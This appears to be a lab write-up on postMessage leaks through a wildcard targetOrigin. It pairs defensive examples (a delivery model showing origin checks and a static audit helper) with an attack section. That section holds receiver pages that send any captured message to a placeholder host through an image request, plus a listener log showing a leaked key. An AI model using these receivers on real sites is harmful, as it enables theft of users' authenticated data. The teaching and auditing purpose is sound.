Origin as Wildcard (*)
A postMessage leak occurs when a page sends sensitive data with targetOrigin set to "*": the wildcard tells the browser to deliver the message no matter which origin the receiving window belongs to, so any malicious site that holds a reference to the sending window (as its opener or its parent frame) receives the authenticated data via cross-origin messaging.
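The rule behind the leak, and the two checks that close it, as an added example that is not part of the original write-up: a tiny in-memory model of how browsers deliver window.postMessage() (window references, targetOrigin matching, event.origin on the receiving side). The origins app.example, dashboard.example and evil.example and the key value "k3y" are assumptions made for the demonstration; a real browser fills in event.source itself, whereas the model passes the sender explicitly.

```javascript
// Added example, not the page's code: a small in-memory model of how browsers
// deliver window.postMessage(), to show why targetOrigin "*" leaks the key and
// which two checks stop it. The origins app.example, dashboard.example and
// evil.example are invented for the demonstration.

class FakeWindow {
  constructor(origin) {
    this.origin = origin;    // origin of the document currently loaded in this window
    this.opener = null;      // set when another window opened this one
    this.listeners = [];
  }

  addEventListener(type, fn) {
    if (type === "message") this.listeners.push(fn);
  }

  // Browser rule: unless targetOrigin is "*", the message is silently dropped
  // when the receiving document's origin does not match it. The sender never
  // learns who really holds the window reference. (A real browser sets
  // event.source itself; this model takes the sender as a third parameter.)
  postMessage(data, targetOrigin, sender) {
    if (targetOrigin !== "*" && targetOrigin !== this.origin) return;
    const event = { data, origin: sender.origin, source: sender };
    for (const fn of this.listeners) fn(event);
  }
}

const APP_ORIGIN = "https://app.example";             // page that holds the key
const DASHBOARD_ORIGIN = "https://dashboard.example"; // the only intended recipient

// Sender side. The write-up's vulnerable pattern is sendKey(app, key, "*"):
// the key goes to whichever window opened the app. The fix is
// sendKey(app, key, DASHBOARD_ORIGIN): an opener at any other origin (for
// instance a page that simply called window.open on the app) gets nothing.
function sendKey(app, key, targetOrigin) {
  app.opener.postMessage({ id: 0, value: key }, targetOrigin, app);
}

// Receiver side, hardened: accept only messages whose event.origin is the app.
// Returns the array that accepted payloads are appended to.
function installReceiver(win, trustedOrigin) {
  const accepted = [];
  win.addEventListener("message", (event) => {
    if (event.origin !== trustedOrigin) return;  // forged or unexpected sender
    accepted.push(event.data);
  });
  return accepted;
}

// Scenario 1: which opener ends up with the key depends only on targetOrigin.
// The opener listens without an origin check, exactly like a PoC receiver page.
// Returns the leaked key, or null when the browser dropped the message.
function keyReachingOpener(openerOrigin, targetOrigin) {
  const opener = new FakeWindow(openerOrigin);
  const seen = [];
  opener.addEventListener("message", (e) => seen.push(e.data.value));
  const app = new FakeWindow(APP_ORIGIN);
  app.opener = opener;
  sendKey(app, "k3y", targetOrigin);
  return seen.length === 1 ? seen[0] : null;
}

// Scenario 2: the dashboard's origin check ignores a forged message even though
// the forger posted it with "*". Returns how many messages were accepted.
function acceptedFromSender(senderOrigin) {
  const dashboard = new FakeWindow(DASHBOARD_ORIGIN);
  const accepted = installReceiver(dashboard, APP_ORIGIN);
  const sender = new FakeWindow(senderOrigin);
  dashboard.postMessage({ id: 0, value: "forged" }, "*", sender);
  return accepted.length;
}

console.log("evil opener, targetOrigin '*'     ->", keyReachingOpener("https://evil.example", "*"));
console.log("evil opener, targetOrigin pinned  ->", keyReachingOpener("https://evil.example", DASHBOARD_ORIGIN));
console.log("dashboard opener, pinned          ->", keyReachingOpener(DASHBOARD_ORIGIN, DASHBOARD_ORIGIN));
console.log("forged message accepted by receiver:", acceptedFromSender("https://evil.example"));
```

Both checks are needed: the sender's targetOrigin protects the data it sends, and the receiver's event.origin check protects the receiver from forged input; neither one substitutes for the other.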
The Attack
- Find where postMessage() is being used with *, then analyze what data is being transferred.
Make an index.html page like so:
<!DOCTYPE html>
<html>
<body>
  <h3>postMessage Leak Receiver PoC</h3>
  <p>Visit this page → if target sends data via postMessage to *, it gets leaked to your server.</p>
  <script>
    // Listen for any message (no origin check on our side)
    window.addEventListener("message", function(event) {
      let leaked = event.data;
      // Sometimes it's JSON, sometimes string, object, etc.
      if (leaked && typeof leaked === "object") {
        leaked = JSON.stringify(leaked);
      } else if (!leaked) {
        leaked = "empty";
      }
      // Stealth exfil via image (bypasses many CSP)
      const img = new Image();
      img.src = "http://public-ip/?leak=" + encodeURIComponent(leaked);
      // Debug in console / on page
      console.log("Leaked via postMessage:", leaked, "from origin:", event.origin);
      document.body.innerHTML += "<p>Leaked: " + leaked + " (from " + event.origin + ")</p>";
    }, false);
    // Open the vulnerable page (popup or iframe)
    setTimeout(() => {
      // Option A: popup (sometimes postMessage goes to opener)
      window.open("http://ptl-1786c44be9f1-e9554eed049e.libcurl.me/key/0");
      // Option B: iframe (if it posts to parent)
      // const ifr = document.createElement("iframe");
      // ifr.src = "http://ptl-1786c44be9f1-e9554eed049e.libcurl.me/key/1";
      // ifr.style.display = "none";
      // document.body.appendChild(ifr);
    }, 500);
  </script>
</body>
</html>
mini.html (a minimal version of the same receiver):
<script>
  window.addEventListener("message", e => {
    if (e.data) new Image().src = `http://public-ip/?pm=${encodeURIComponent(e.data)}`;
  });
  window.open("http://ptl-1786c44be9f1-e9554eed049e.libcurl.me/key/0");
</script>
Then run a Python web server to receive the callbacks:
╰─➤ python3 -m http.server 5959
Serving HTTP on 0.0.0.0 port 5959 (http://0.0.0.0:5959/) ...
Send the link to the victim, then wait for the request to arrive:
╰─➤ python3 -m http.server 5959
Serving HTTP on 0.0.0.0 port 5959 (http://0.0.0.0:5959/) ...
3.237.37.47 - - [18/Jan/2026 06:56:14] "GET / HTTP/1.1" 200 -
3.237.37.47 - - [18/Jan/2026 06:56:15] "GET /?leak=%7B%22id%22%3A0%2C%22value%22%3A%....snip.... HTTP/1.1" 200 -
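For the first step of the procedure, locating every postMessage() call whose targetOrigin is a wildcard, here is an added audit helper that is not code from the write-up: it scans JavaScript source text for postMessage() calls and classifies the second argument so a reviewer can run the check over a whole bundle instead of reading it by eye. The sample bundle SAMPLE_JS and the origins inside it are constructed for the example; the helper is a heuristic tokenizer rather than a full parser, so calls it reports as dynamic still need a manual look.

```javascript
// Added example, not the page's code: a small static audit helper that finds
// postMessage() calls in a JavaScript source string and classifies the
// targetOrigin argument. SAMPLE_JS below and the origins in it are constructed.

// Split the argument list that starts at index `start` (just after "(") into
// top-level arguments, honouring nested (), [], {} and string/template literals.
function splitArgs(src, start) {
  const args = [];
  let depth = 0, cur = "", quote = null, i = start;
  for (; i < src.length; i++) {
    const ch = src[i];
    if (quote) {                                  // inside a string literal
      cur += ch;
      if (ch === "\\") { cur += src[++i] ?? ""; continue; }
      if (ch === quote) quote = null;
      continue;
    }
    if (ch === '"' || ch === "'" || ch === "`") { quote = ch; cur += ch; continue; }
    if ("([{".includes(ch)) { depth++; cur += ch; continue; }
    if (")]}".includes(ch)) {
      if (depth === 0) break;                     // closing paren of the call itself
      depth--; cur += ch; continue;
    }
    if (ch === "," && depth === 0) { args.push(cur.trim()); cur = ""; continue; }
    cur += ch;
  }
  if (cur.trim() !== "" || args.length) args.push(cur.trim());
  return args;
}

// Classify the second argument of a postMessage() call.
function classifyTargetOrigin(arg) {
  if (arg === undefined) return "missing";        // no targetOrigin given at all
  if (arg.startsWith("[")) return "transfer";     // Worker/MessagePort form: 2nd arg is a transfer list
  const lit = arg.match(/^(['"`])(.*)\1$/);       // plain string literal
  if (lit) return lit[2] === "*" ? "wildcard" : "literal";
  if (arg.startsWith("{")) {                      // options form: { targetOrigin: ... }
    const opt = arg.match(/targetOrigin\s*:\s*(['"`])(.*?)\1/);
    if (opt) return opt[2] === "*" ? "wildcard" : "literal";
    return "dynamic";
  }
  return "dynamic";                               // variable or expression: needs manual review
}

const SEVERITY = { wildcard: "high", dynamic: "review", missing: "review", literal: "ok", transfer: "ok" };

function lineOf(src, idx) {
  return src.slice(0, idx).split("\n").length;
}

// Walk the source and return one finding per postMessage() call.
function auditPostMessage(src) {
  const findings = [];
  const re = /\bpostMessage\s*\(/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const args = splitArgs(src, m.index + m[0].length);
    const kind = classifyTargetOrigin(args[1]);
    findings.push({
      line: lineOf(src, m.index),
      data: args[0] ?? "",
      targetOrigin: args[1] ?? "",
      kind,
      severity: SEVERITY[kind],
    });
  }
  return findings;
}

// Constructed sample bundle: the first call is the pattern from the write-up.
const SAMPLE_JS = `
function shareKey(key) {
  window.opener.postMessage({ id: 0, value: key }, "*");
}
function shareKeySafe(key) {
  window.opener.postMessage({ id: 0, value: key }, 'https://dashboard.example');
}
parent.postMessage(JSON.stringify(state), targetOrigin);
worker.postMessage(buffer, [buffer]);
frame.contentWindow.postMessage("ping", { targetOrigin: "*" });
`;

for (const f of auditPostMessage(SAMPLE_JS)) {
  console.log(`line ${f.line}: ${f.severity.padEnd(6)} targetOrigin=${f.targetOrigin || "(none)"} data=${f.data}`);
}
```

The helper also recognises the options-object form `postMessage(data, { targetOrigin: "*" })`, which simple grep patterns for `"*"` as the second argument miss, and it marks the Worker/MessagePort form (array second argument) as not applicable, since those channels have no targetOrigin at all. Every "high" hit should be read together with the first argument: the severity of the leak depends on what data is being sent.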